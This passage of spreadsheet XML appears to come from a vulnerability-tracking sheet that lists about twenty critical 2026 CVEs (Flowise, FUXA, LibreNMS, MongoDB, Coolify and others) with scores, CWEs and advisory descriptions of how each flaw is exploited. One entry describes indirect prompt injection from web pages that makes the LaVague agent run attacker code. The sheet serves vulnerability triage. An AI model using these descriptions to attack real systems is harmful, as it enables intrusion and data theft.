      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="L575" s="5" t="inlineStr">
        <is>
          <t>An insecure Apache configuration in ConfigServer Security &amp; Firewall maps /usr/bin as CGI programs through the Messenger v3 HTTPS virtual host. A remote unauthenticated attacker whose address is blocked can request a mapped executable and run arbitrary commands as the Apache user. The vulnerability affects installations where CSF Messenger v3 and its HTTPS mode are enabled. WebPros addressed the vulnerability in version 16.31.</t>
        </is>
      </c>
      <c r="M575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67402</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67443</t>
        </is>
      </c>
      <c r="C576" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D576" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E576" s="5" t="inlineStr"/>
      <c r="F576" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L576" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. In 1.3.2 and earlier, the allowDashboard authorization gate in server/integrations/node-red/index.js calls authJwt.verify for /nodered without inspecting the decoded identity. When nodeRedEnabled is true, secureEnabled is true, and nodeRedAuthMode is secure, a remote unauthenticated attacker can obtain a signed guest token from POST /api/heartbeat and use it to access the RED.httpAdmin editor and flow deployment API. Because the Node-RED configuration has no second adminAuth gate, the attacker can deploy function nodes or invoke fuxa.runScript and runtime.scriptsMgr.runScript, gaining control of FUXA project data, configuration, scripts, filesystem-capable runtime helpers, and potentially operating-system commands when nodeRedUnsafeModules is enabled. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="M576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67443</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69255</t>
        </is>
      </c>
      <c r="C577" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D577" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E577" s="5" t="inlineStr"/>
      <c r="F577" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G577" s="5" t="inlineStr">
        <is>
          <t>node.js, python</t>
        </is>
      </c>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L577" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent in packages/components/nodes/agents/CSVAgent/CSVAgent.ts extracted attacker-controlled CSV data with file.split(',').pop() and interpolated it directly into executable Python as base64_string = "${base64String}" before calling Pyodide. The validatePythonCodeForDataFrame() denylist only checked later LLM-generated code and did not validate this initial code block. An authenticated attacker could inject a closing quote followed by Python code, use Pyodide's js bridge to load Node.js child_process, and execute arbitrary operating system commands as root in the Flowise container. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69255</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70460</t>
        </is>
      </c>
      <c r="C578" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D578" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E578" s="5" t="inlineStr"/>
      <c r="F578" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L578" s="5" t="inlineStr">
        <is>
          <t>rsync 2.3.3 before 3.5.0 contains a path traversal vulnerability that allows a malicious sender to escape the module root by exploiting symlinks within the module file tree when using --partial-dir or --backup-dir options. Attackers with write access to place a symlink under the module root, or who can exploit a pre-existing trusted symlink, can direct file writes to locations outside the intended module root, achieving arbitrary file write relative to the module root parent.</t>
        </is>
      </c>
      <c r="M578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70460</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70478</t>
        </is>
      </c>
      <c r="C579" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D579" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E579" s="5" t="inlineStr"/>
      <c r="F579" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L579" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the POST /api/v1/oauth2-credential/refresh/:credentialId endpoint is included in WHITELIST_URLS and requires no authentication. The endpoint decrypts the stored credential, sends a refresh request to the configured OAuth provider with the client secret and refresh token, and returns the refreshed access_token in the response body. An attacker with a credential ID can use the token to access the victim's connected service and can also exhaust refresh-token quota. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70478</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72836</t>
        </is>
      </c>
      <c r="C580" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D580" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E580" s="5" t="inlineStr"/>
      <c r="F580" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G580" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L580" s="5" t="inlineStr">
        <is>
          <t>FileBrowser before 2.63.19 does not account for case-insensitive filesystems when checking home directory ownership during self-registration. When Signup and CreateUserDir are enabled and FileBrowser's root is on a case-insensitive filesystem (confirmed on Windows/NTFS), two self-registered usernames that differ only in letter case (e.g., CaseVictim and casevictim) are stored as distinct accounts but resolve to the same physical home directory, because the scope-ownership check compares the persisted scope as an exact case-sensitive string. A second registrant can therefore read, overwrite, and delete another account's files through authenticated HTTP endpoints, without needing an existing account or victim interaction.</t>
        </is>
      </c>
      <c r="M580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72836</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73414</t>
        </is>
      </c>
      <c r="C581" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D581" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E581" s="5" t="inlineStr"/>
      <c r="F581" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G581" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr">
        <is>
          <t>CWE-150, CWE-78</t>
        </is>
      </c>
      <c r="L581" s="5" t="inlineStr">
        <is>
          <t>Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, getEscapeFunction in src/internal/win/cmd.js does not escape `(` and `)` when applications use the escape or escapeAll APIs on Windows with shell set to cmd.exe, or with shell set to true when CMD is the default. An attacker-controlled argument can break out of a parenthesized CMD construct and inject shell syntax depending on the original command, resulting in arbitrary command execution. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73414</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75856</t>
        </is>
      </c>
      <c r="C582" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D582" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E582" s="5" t="inlineStr"/>
      <c r="F582" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L582" s="5" t="inlineStr">
        <is>
          <t>CodeWhale before 0.8.64 contains a server-side request forgery bypass vulnerability in DNS pinning logic that fails to prevent time-of-check-time-of-use attacks. Attackers can manipulate DNS responses to fail initial resolution checks and succeed on secondary requests, allowing requests to internal IP addresses and bypassing SSRF mitigations.</t>
        </is>
      </c>
      <c r="M582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75856</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77635</t>
        </is>
      </c>
      <c r="C583" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D583" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E583" s="5" t="inlineStr"/>
      <c r="F583" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L583" s="5" t="inlineStr">
        <is>
          <t>CakePHP is a rapid development framework for PHP. Prior to versions 5.1.10, 5.2.15, and 5.3.7 on their respective release lines, FunctionsBuilder::jsonValue() with PostgresDriver is vulnerable to SQL injection when user-controlled data is supplied to the jsonPath parameter. This issue is fixed in versions 5.1.10, 5.2.15, and 5.3.7.</t>
        </is>
      </c>
      <c r="M583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77635</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77645</t>
        </is>
      </c>
      <c r="C584" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D584" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E584" s="5" t="inlineStr"/>
      <c r="F584" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="inlineStr"/>
      <c r="I584" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-502</t>
        </is>
      </c>
      <c r="L584" s="5" t="inlineStr">
        <is>
          <t>A critical remote code execution (RCE) vulnerability has been reported in PTC Windchill and PTC FlexPLM. The vulnerability may be exploited through the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="M584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77645</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="C585" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D585" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E585" s="5" t="inlineStr"/>
      <c r="F585" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G585" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L585" s="5" t="inlineStr">
        <is>
          <t>Improper handling of case sensitivity in the configuration validation component of MongoDB Server may cause the authorization subsystem to remain in a default disabled state during server startup. An unauthenticated user with network access to a deployment where this condition occurs can perform arbitrary administrative operations, resulting in full impact of data confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="M585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82090</t>
        </is>
      </c>
      <c r="C586" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D586" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E586" s="5" t="inlineStr"/>
      <c r="F586" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G586" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H586" s="5" t="inlineStr"/>
      <c r="I586" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L586" s="5" t="inlineStr">
        <is>
          <t>Pocket through 8.33.0.0 allows XSS because "Save to Pocket" injects external HTML into the DOM.  JavaScript code can alter the application state via native bridge methods.</t>
        </is>
      </c>
      <c r="M586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82090</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84189</t>
        </is>
      </c>
      <c r="C587" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D587" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E587" s="5" t="inlineStr"/>
      <c r="F587" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L587" s="5" t="inlineStr">
        <is>
          <t>LibreNMS through 26.4.0 renders JSON fields (name, ip, model, author, commit message) returned by the admin-configurable Oxidized integration URL (oxidized.url) into the device showconfig page without applying htmlspecialchars(). An administrator who points the Oxidized URL at an attacker-controlled server (SSRF) can cause it to return malicious JSON, resulting in stored/persistent cross-site scripting affecting all users who view any device's showconfig tab. Fixed in 26.7.0.</t>
        </is>
      </c>
      <c r="M587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84189</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84197</t>
        </is>
      </c>
      <c r="C588" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D588" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E588" s="5" t="inlineStr"/>
      <c r="F588" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G588" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-297, CWE-300</t>
        </is>
      </c>
      <c r="L588" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Ditto's Node.js JavaScript client, all released versions of @eclipse-ditto/ditto-javascript-client-node from 2.0.0 to 3.9.0 and of its predecessor package @eclipse-ditto/ditto-javascript-client-node_1.0 from 1.0.0 to 2.1.0, the WebSocket transport hard-codes rejectUnauthorized: false when creating the underlying ws WebSocket. Certificate chain and hostname validation are therefore disabled for every wss:// connection, and no builder option, constructor argument or environment variable lets an application turn validation back on. An attacker in a position to intercept the connection can present an arbitrary certificate, complete the TLS handshake, read the credentials that the configured authentication provider sends in the Authorization header of the WebSocket upgrade request, and read, alter or inject Ditto Protocol messages for the lifetime of the connection. The Java client, the browser/DOM JavaScript client and the HTTP transport of the Node.js client are not affected.</t>
        </is>
      </c>
      <c r="M588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85427</t>
        </is>
      </c>
      <c r="C589" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D589" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E589" s="5" t="inlineStr"/>
      <c r="F589" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="L589" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos pAntler through 10.0.1 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary programs by publishing a crafted MISSION_FILE message to the MOOSDB. Attackers can publish a mission file containing malicious Run entries that pAntler parses and executes via execvp() without authentication validation.</t>
        </is>
      </c>
      <c r="M589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85427</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85614</t>
        </is>
      </c>
      <c r="C590" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D590" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E590" s="5" t="inlineStr"/>
      <c r="F590" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L590" s="5" t="inlineStr">
        <is>
          <t>OpenPanel before 2.3.0 contains an unauthenticated server-side request forgery vulnerability in the GET /tools/site-checker endpoint that accepts a fully client-controlled URL parameter with no private IP filtering or DNS-rebinding protection. Attackers can make the OpenPanel server issue requests to internal services, localhost, and cloud metadata endpoints, reading internal HTTP response titles, headers, status codes, and SSL certificate information.</t>
        </is>
      </c>
      <c r="M590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85614</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85625</t>
        </is>
      </c>
      <c r="C591" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D591" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E591" s="5" t="inlineStr"/>
      <c r="F591" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G591" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H591" s="5" t="inlineStr"/>
      <c r="I591" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L591" s="5" t="inlineStr">
        <is>
          <t>sift (sift.js) 17.1.3 enumerates query keys with for...in, which walks the object prototype chain, and dispatches any matched operator key including $where. The $where operation compiles a string value into a function using new Function unless CSP_ENABLED is set (not set by default). As a result, if a prototype-pollution primitive elsewhere in the process sets Object.prototype.$where to a malicious string, even benign filter calls such as sift({}) execute arbitrary JavaScript. Additionally, passing an untrusted query object containing a string $where directly to sift results in code execution under the default configuration.</t>
        </is>
      </c>
      <c r="M591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85625</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85694</t>
        </is>
      </c>
      <c r="C592" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D592" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G592" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L592" s="5" t="inlineStr">
        <is>
          <t>LaVague 0.2.35 contains a remote code execution vulnerability in PythonFromMarkdownExtractor.extract_as_object that evaluates untrusted language model output derived from web page content. Attackers can inject malicious Python code through web pages using indirect prompt injection to execute arbitrary code on the operator's host without review.</t>
        </is>
      </c>
      <c r="M592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85694</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86117</t>
        </is>
      </c>
      <c r="C593" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D593" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L593" s="5" t="inlineStr">
        <is>
          <t>Coolify through 4.3.17 contains an authentication bypass vulnerability in the OAuth callback handler that signs users into existing accounts based solely on email address without verifying provider assertions or binding OAuth identities. Attackers can register a victim's email address on any enabled OAuth provider to obtain authenticated sessions as that user, bypassing password requirements and two-factor authentication.</t>
        </is>
      </c>
      <c r="M593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86117</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86426</t>
        </is>
      </c>
      <c r="C594" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D594" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E594" s="5" t="inlineStr"/>
      <c r="F594" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="G594" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H594" s="5" t="inlineStr"/>
      <c r="I594" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L594" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.8.0 contains an authentication bypass vulnerability in the REST API that allows unauthenticated attackers to access protected endpoints by sending numeric values instead of string tokens. Attackers can exploit MySQL type coercion by sending small integers like 0 through 9 to match token hashes, gaining access to API functionality including device credentials and administrative features that enable remote code execution through alert templates.</t>
        </is>
      </c>
      <c r="M594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86426</t>
        </is>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87930</t>
        </is>
      </c>
      <c r="C595" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D595" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E595" s="5" t="inlineStr"/>
      <c r="F595" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G595" s="5" t="inlineStr"/>
      <c r="H595" s="5" t="inlineStr"/>
      <c r="I595" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J595" s="5" t="inlineStr"/>
      <c r="K595" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L595" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 passes the ci_session cookie to unserialize() without class restrictions, allowing unauthenticated attackers to inject PHP objects. Attackers can forge valid session cookies using the hardcoded encryption key to trigger magic methods and corrupt application state or achieve code execution if gadget classes exist.</t>
        </is>
      </c>
      <c r="M595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87930</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88880</t>
        </is>
      </c>
      <c r="C596" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="D596" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
